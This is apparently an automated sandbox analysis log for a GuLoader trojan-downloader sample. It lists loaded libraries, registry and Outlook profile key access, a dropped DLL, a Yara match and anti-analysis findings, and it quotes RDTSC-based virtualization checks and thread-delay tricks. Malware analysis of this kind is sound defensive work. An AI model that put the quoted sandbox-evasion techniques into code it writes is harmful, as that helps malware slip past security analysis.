Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File written: C:\Users\user\Slutafregningers175\ammunitionsfabrikkers\Jetflyene\Enculturating.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe PID: 3672, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2372837540.0000000008F96000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_10001A5D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 0_2_10002D20 push eax; ret	0_2_10002D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_3_0759CF4A push eax; iretd	7_3_0759CF4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_3_0759EE8C push eax; iretd	7_3_0759EEA9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_3_0759EE31 push eax; iretd	7_3_0759EE65
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07559C30 push esp; retf 0757h	7_2_07559D55
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07558DDF push esp; iretd	7_2_07558DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_07558C2F pushfd ; iretd	7_2_07558C30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_0755891E pushad ; iretd	7_2_0755891F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3A6D37C8 pushad ; iretd	7_2_3A6D37C9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Code function: 7_2_3B03A428 pushfd ; iretd	7_2_3B03A429

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe

File created: C:\Users\user\AppData\Local\Temp\nsbDEDF.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	API/Special instruction interceptor: Address: 9328209
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	API/Special instruction interceptor: Address: 5798209

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	RDTSC instruction interceptor: First address: 92C928D second address: 92C928D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F71751E4BCCh 0x00000006 cmp ebx, 2224A090h 0x0000000c inc ebp 0x0000000d test ch, ah 0x0000000f inc ebx 0x00000010 cmp ebx, 312C63EEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	RDTSC instruction interceptor: First address: 573928D second address: 573928D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F71751E473Ch 0x00000006 cmp ebx, 2224A090h 0x0000000c inc ebp 0x0000000d test ch, ah 0x0000000f inc ebx 0x00000010 cmp ebx, 312C63EEh 0x00000016 rdtsc

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Memory allocated: 7510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Memory allocated: 37EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Memory allocated: 37CC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.GuLoader.QAKJ8V.27372.733.exe	Thread delayed: delay time: 597453	Jump to behavior
